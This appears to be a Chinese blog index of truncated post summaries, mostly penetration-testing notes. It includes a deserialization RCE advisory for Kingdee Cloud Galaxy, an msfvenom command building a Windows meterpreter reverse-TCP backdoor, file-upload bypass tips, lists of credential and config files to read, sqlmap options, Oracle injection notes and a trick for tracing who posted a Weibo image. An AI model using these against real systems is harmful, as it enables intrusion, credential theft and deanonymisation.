摘要:
漏洞介绍 由于金蝶云星空管理中心在处理序列化数据时,未对数据进行签名或校验,攻击手可以写入包含恶意代码的序列化数据,系统在进行反序列化时造成远程命令执行,该“管理中心“是提供给管理员使用的管理端,默认开放于8000端口。 影响版本 6.x版本:低于6.2.1012.47.x版本:7.0.352.16 阅读全文
摘要:
pip-review 基本使用方法: pip install pip-review #查看可更新 pip-review #自动批量升级 pip-review --auto #以交互方式运行,对每个包进行升级 pip-review --interactive 阅读全文
摘要:
1. 制作Windows恶意软件 1.1 使用msfvenom生成后门木马 制作后门程序 sudo msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.142.135 LPORT=44 阅读全文
摘要:
关于开启msfconsole遇到数据库连接的问题 首先,确认一下,postgresql 服务是否已经启动。 如未启动,输入 service postgresql start kali用下面这句命令 /etc/init.d/postgresql start 如果不奏效,在msf中直接使用msfdb d 阅读全文
摘要:
文件上传 1. 文件类型检测绕过 1.1. 更改请求绕过 有的站点仅仅在前端检测了文件类型,这种类型的检测可以直接修改网络请求绕过。 同样的,有的站点在后端仅检查了HTTP Header中的信息,比如 Content-Type 等,这种检查同样可以通过修改网络请求绕过。 1.2. Magic检测绕过 阅读全文
摘要:
考虑读取可能有敏感信息的文件 用户目录下的敏感文件 .bash_history .zsh_history .profile .bashrc .gitconfig .viminfo passwd 应用的配置文件 /etc/apache2/apache2.conf /etc/nginx/nginx.co 阅读全文
摘要:
1.设置请求头 --random-agent --user-agent="User-Agent':'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" --user-agent="M 阅读全文
摘要:
通过微博图片链接可以直接找到发图的人 例: 图片地址: https://tvax1.sinaimg.cn/crop.0.0.1080.1080.180/63885668ly8geyrcrw0zjj20u00u0mz6.jpg?KID=imgbed,tva&Expires=1620073273&ssi 阅读全文
摘要:
一、cmd修改注册表(推荐) Win11切换经典右键菜单: reg add "HKCU\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32" /f /ve taskkill /f /im explo 阅读全文
摘要:
Oracle注入 1.Oracle的数据类型是强匹配的(MYSQL有弱匹配的味道),所以在Oracle进行类似UNION查询数据时候必须让对应位置上的数据类型和表中的列的数据类型是一致的,也可以使用null代替某些无法快速猜测出数据类型的位置。 2.Oracle的单行注释符号是-- ,多行注释符号/ 阅读全文